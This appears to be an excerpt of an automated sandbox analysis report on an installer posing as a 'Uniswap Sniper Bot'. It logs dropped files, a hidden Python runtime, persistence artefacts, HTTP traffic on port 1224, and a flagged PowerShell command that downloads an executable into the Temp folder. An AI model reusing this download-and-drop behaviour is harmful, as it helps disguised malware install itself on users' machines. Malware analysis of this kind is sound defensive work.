Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: python311.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: version.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: powrprof.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: pdh.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: umpdc.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: pywintypes311.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: vcruntime140_1.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: vcruntime140_1.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: msimg32.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: secur32.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: sspicli.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: libcrypto-1_1.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: libssl-1_1.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: mswsock.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: python311.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: version.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: iphlpapi.dll

Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "USERNAME eq user" /FI "IMAGENAME eq uniswap-sniper-bot-with-gui.exe" /FO csv

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\deed1b2d-6a1c-5708-934a-7202254448da

Jump to behavior

Source: Uniswap Sniper Bot With GUI.exe

Static file information: File size 74110256 > 1048576

Source: Uniswap Sniper Bot With GUI.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: ffmpeg.dll.pdb source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2356191177.0000000004F2D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D3DCompiler_47.pdb source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2354669303.0000000004F2F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: vulkan-1.dll.pdb source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2349304685.0000000005C20000.00000004.00001000.00020000.00000000.sdmp, Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2345744716.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp, Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2345521387.0000000004C20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D3DCompiler_47.pdbGCTL source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2354669303.0000000004F2F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: electron.exe.pdb source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2350544276.0000000006FB9000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: libGLESv2.dll.pdb source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2289742502.0000000006120000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: vk_swiftshader.dll.pdb source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2349304685.0000000005F98000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Suspicious powershell command line found

Source: C:\Users\user\.pyp\python.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filePath = \"C:\Users\user\AppData\Local\Temp\tmpn1hib8nx.exe\" Invoke-WebRequest -Uri $url -OutFile $filePath "
Source: C:\Users\user\.pyp\python.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filePath = \"C:\Users\user\AppData\Local\Temp\tmpn1hib8nx.exe\" Invoke-WebRequest -Uri $url -OutFile $filePath "

Source: ffmpeg.dll.0.dr	Static PE information: section name: .00cfg
Source: ffmpeg.dll.0.dr	Static PE information: section name: .gxfg
Source: ffmpeg.dll.0.dr	Static PE information: section name: .retplne
Source: ffmpeg.dll.0.dr	Static PE information: section name: .voltbl
Source: ffmpeg.dll.0.dr	Static PE information: section name: _RDATA
Source: libEGL.dll.0.dr	Static PE information: section name: .00cfg
Source: libEGL.dll.0.dr	Static PE information: section name: .gxfg
Source: libEGL.dll.0.dr	Static PE information: section name: .retplne
Source: libEGL.dll.0.dr	Static PE information: section name: .voltbl
Source: libEGL.dll.0.dr	Static PE information: section name: _RDATA
Source: libGLESv2.dll.0.dr	Static PE information: section name: .00cfg
Source: libGLESv2.dll.0.dr	Static PE information: section name: .gxfg
Source: libGLESv2.dll.0.dr	Static PE information: section name: .retplne
Source: libGLESv2.dll.0.dr	Static PE information: section name: .voltbl
Source: libGLESv2.dll.0.dr	Static PE information: section name: _RDATA
Source: uniswap-sniper-bot-with-gui.exe.0.dr	Static PE information: section name: .00cfg
Source: uniswap-sniper-bot-with-gui.exe.0.dr	Static PE information: section name: .gxfg
Source: uniswap-sniper-bot-with-gui.exe.0.dr	Static PE information: section name: .retplne
Source: uniswap-sniper-bot-with-gui.exe.0.dr	Static PE information: section name: .rodata
Source: uniswap-sniper-bot-with-gui.exe.0.dr	Static PE information: section name: .voltbl
Source: uniswap-sniper-bot-with-gui.exe.0.dr	Static PE information: section name: CPADinfo
Source: uniswap-sniper-bot-with-gui.exe.0.dr	Static PE information: section name: _RDATA
Source: uniswap-sniper-bot-with-gui.exe.0.dr	Static PE information: section name: malloc_h
Source: vk_swiftshader.dll.0.dr	Static PE information: section name: .00cfg
Source: vk_swiftshader.dll.0.dr	Static PE information: section name: .gxfg
Source: vk_swiftshader.dll.0.dr	Static PE information: section name: .retplne
Source: vk_swiftshader.dll.0.dr	Static PE information: section name: .voltbl
Source: vk_swiftshader.dll.0.dr	Static PE information: section name: _RDATA
Source: vulkan-1.dll.0.dr	Static PE information: section name: .00cfg
Source: vulkan-1.dll.0.dr	Static PE information: section name: .gxfg
Source: vulkan-1.dll.0.dr	Static PE information: section name: .retplne
Source: vulkan-1.dll.0.dr	Static PE information: section name: .voltbl
Source: vulkan-1.dll.0.dr	Static PE information: section name: _RDATA
Source: ffmpeg.dll0.0.dr	Static PE information: section name: .00cfg
Source: ffmpeg.dll0.0.dr	Static PE information: section name: .gxfg
Source: ffmpeg.dll0.0.dr	Static PE information: section name: .retplne
Source: ffmpeg.dll0.0.dr	Static PE information: section name: .voltbl
Source: ffmpeg.dll0.0.dr	Static PE information: section name: _RDATA
Source: libEGL.dll0.0.dr	Static PE information: section name: .00cfg
Source: libEGL.dll0.0.dr	Static PE information: section name: .gxfg
Source: libEGL.dll0.0.dr	Static PE information: section name: .retplne
Source: libEGL.dll0.0.dr	Static PE information: section name: .voltbl
Source: libEGL.dll0.0.dr	Static PE information: section name: _RDATA
Source: libGLESv2.dll0.0.dr	Static PE information: section name: .00cfg
Source: libGLESv2.dll0.0.dr	Static PE information: section name: .gxfg
Source: libGLESv2.dll0.0.dr	Static PE information: section name: .retplne
Source: libGLESv2.dll0.0.dr	Static PE information: section name: .voltbl
Source: libGLESv2.dll0.0.dr	Static PE information: section name: _RDATA
Source: uniswap-sniper-bot-with-gui.exe0.0.dr	Static PE information: section name: .00cfg
Source: uniswap-sniper-bot-with-gui.exe0.0.dr	Static PE information: section name: .gxfg
Source: uniswap-sniper-bot-with-gui.exe0.0.dr	Static PE information: section name: .retplne
Source: uniswap-sniper-bot-with-gui.exe0.0.dr	Static PE information: section name: .rodata
Source: uniswap-sniper-bot-with-gui.exe0.0.dr	Static PE information: section name: .voltbl
Source: uniswap-sniper-bot-with-gui.exe0.0.dr	Static PE information: section name: CPADinfo
Source: uniswap-sniper-bot-with-gui.exe0.0.dr	Static PE information: section name: _RDATA
Source: uniswap-sniper-bot-with-gui.exe0.0.dr	Static PE information: section name: malloc_h
Source: vk_swiftshader.dll0.0.dr	Static PE information: section name: .00cfg
Source: vk_swiftshader.dll0.0.dr	Static PE information: section name: .gxfg
Source: vk_swiftshader.dll0.0.dr	Static PE information: section name: .retplne
Source: vk_swiftshader.dll0.0.dr	Static PE information: section name: .voltbl
Source: vk_swiftshader.dll0.0.dr	Static PE information: section name: _RDATA
Source: vulkan-1.dll0.0.dr	Static PE information: section name: .00cfg
Source: vulkan-1.dll0.0.dr	Static PE information: section name: .gxfg
Source: vulkan-1.dll0.0.dr	Static PE information: section name: .retplne
Source: vulkan-1.dll0.0.dr	Static PE information: section name: .voltbl
Source: vulkan-1.dll0.0.dr	Static PE information: section name: _RDATA
Source: node.napi.node2.0.dr	Static PE information: section name: _RDATA
Source: node.napi.node6.0.dr	Static PE information: section name: _RDATA
Source: node.napi.node8.0.dr	Static PE information: section name: _RDATA
Source: libcrypto-1_1.dll.21.dr	Static PE information: section name: .00cfg
Source: libssl-1_1.dll.21.dr	Static PE information: section name: .00cfg

Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\DLLs\select.pyd	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\DLLs\_socket.pyd	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\DLLs\_uuid.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	File created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\libEGL.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\DLLs\winsound.pyd	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\DLLs\_overlapped.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	File created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\ffmpeg.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	File created: C:\Users\user\AppData\Local\Temp\nsu535F.tmp\nsExec.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\DLLs\_asyncio.pyd	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\DLLs\_ctypes.pyd	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\DLLs\_elementtree.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	File created: C:\Users\user\AppData\Local\Temp\nsu535F.tmp\7z-out\resources\elevate.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	File created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\vk_swiftshader.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	File created: C:\Users\user\AppData\Local\Temp\nsu535F.tmp\SpiderBanner.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\DLLs\_decimal.pyd	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\DLLs\_zoneinfo.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	File created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\libGLESv2.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	File created: C:\Users\user\AppData\Local\Temp\nsu535F.tmp\7z-out\vulkan-1.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\Lib\site-packages\charset_normalizer\md__mypyc.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\DLLs\_lzma.pyd	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\DLLs\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	File created: C:\Users\user\AppData\Local\Temp\nsu535F.tmp\7z-out\resources\app.asar.unpacked\node_modules\keccak\prebuilds\win32-x64\node.napi.node	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\DLLs\libssl-1_1.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\DLLs\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	File created: C:\Users\user\AppData\Local\Temp\nsu535F.tmp\nsis7z.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	File created: C:\Users\user\AppData\Local\Temp\nsu535F.tmp\7z-out\resources\app.asar.unpacked\node_modules\bufferutil\prebuilds\win32-ia32\node.napi.node	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	File created: C:\Users\user\AppData\Local\Temp\nsu535F.tmp\7z-out\ffmpeg.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	File created: C:\Users\user\AppData\Local\Temp\nsu535F.tmp\7z-out\libEGL.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\DLLs\pyexpat.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	File created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\vulkan-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	File created: C:\Users\user\AppData\Local\Temp\nsu535F.tmp\StdUtils.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	File created: C:\Users\user\AppData\Local\Temp\nsu535F.tmp\7z-out\resources\app.asar.unpacked\node_modules\utf-8-validate\prebuilds\win32-ia32\node.napi.node	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\DLLs\_multiprocessing.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	File created: C:\Users\user\AppData\Local\Temp\nsu535F.tmp\7z-out\resources\app.asar.unpacked\node_modules\bufferutil\prebuilds\win32-x64\node.napi.node	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	File created: C:\Users\user\AppData\Local\Temp\nsu535F.tmp\7z-out\resources\app.asar.unpacked\node_modules\secp256k1\prebuilds\win32-x64\secp256k1.node	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	File created: C:\Users\user\AppData\Local\Temp\nsu535F.tmp\7z-out\d3dcompiler_47.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\DLLs\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	File created: C:\Users\user\AppData\Local\Temp\nsu535F.tmp\7z-out\resources\app.asar.unpacked\node_modules\utf-8-validate\prebuilds\win32-x64\node.napi.node	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	File created: C:\Users\user\AppData\Local\Temp\nsu535F.tmp\System.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\DLLs\_msi.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	File created: C:\Users\user\AppData\Local\Temp\nsu535F.tmp\7z-out\uniswap-sniper-bot-with-gui.exe	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\DLLs\_queue.pyd	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\DLLs\libcrypto-1_1.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\DLLs\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	File created: C:\Users\user\AppData\Local\Temp\nsu535F.tmp\7z-out\vk_swiftshader.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	File created: C:\Users\user\AppData\Local\Temp\nsu535F.tmp\7z-out\libGLESv2.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	File created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\DLLs\unicodedata.pyd	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\Lib\site-packages\charset_normalizer\md.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	File created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\d3dcompiler_47.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\DLLs\_ssl.pyd	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\DLLs\libffi-8.dll	Jump to dropped file

Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	File created: C:\Users\user\AppData\Local\Temp\nsu535F.tmp\7z-out\resources\app.asar.unpacked\node_modules\utf-8-validate\prebuilds\win32-ia32\node.napi.node	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	File created: C:\Users\user\AppData\Local\Temp\nsu535F.tmp\7z-out\resources\app.asar.unpacked\node_modules\utf-8-validate\prebuilds\win32-x64\node.napi.node	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	File created: C:\Users\user\AppData\Local\Temp\nsu535F.tmp\7z-out\resources\app.asar.unpacked\node_modules\bufferutil\prebuilds\win32-ia32\node.napi.node	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	File created: C:\Users\user\AppData\Local\Temp\nsu535F.tmp\7z-out\resources\app.asar.unpacked\node_modules\bufferutil\prebuilds\win32-x64\node.napi.node	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	File created: C:\Users\user\AppData\Local\Temp\nsu535F.tmp\7z-out\resources\app.asar.unpacked\node_modules\keccak\prebuilds\win32-x64\node.napi.node	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	File created: C:\Users\user\AppData\Local\Temp\nsu535F.tmp\7z-out\resources\app.asar.unpacked\node_modules\secp256k1\prebuilds\win32-x64\secp256k1.node	Jump to dropped file

Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	File created: C:\Users\user\AppData\Local\Temp\nsu535F.tmp\7z-out\LICENSE.electron.txt			Jump to behavior
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	File created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\LICENSE.electron.txt			Jump to behavior

Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\uniswap-sniper-bot-with-gui.lnk

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 1224
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 1224
Source: unknown	Network traffic detected: HTTP traffic on port 1224 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 1224 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49992 -> 1224
Source: unknown	Network traffic detected: HTTP traffic on port 1224 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 1224
Source: unknown	Network traffic detected: HTTP traffic on port 1224 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 49995 -> 1224
Source: unknown	Network traffic detected: HTTP traffic on port 1224 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 1224
Source: unknown	Network traffic detected: HTTP traffic on port 1224 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 50001 -> 1224
Source: unknown	Network traffic detected: HTTP traffic on port 1224 -> 50001

Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe

Registry key monitored for changes: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Spelling

Jump to behavior

Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
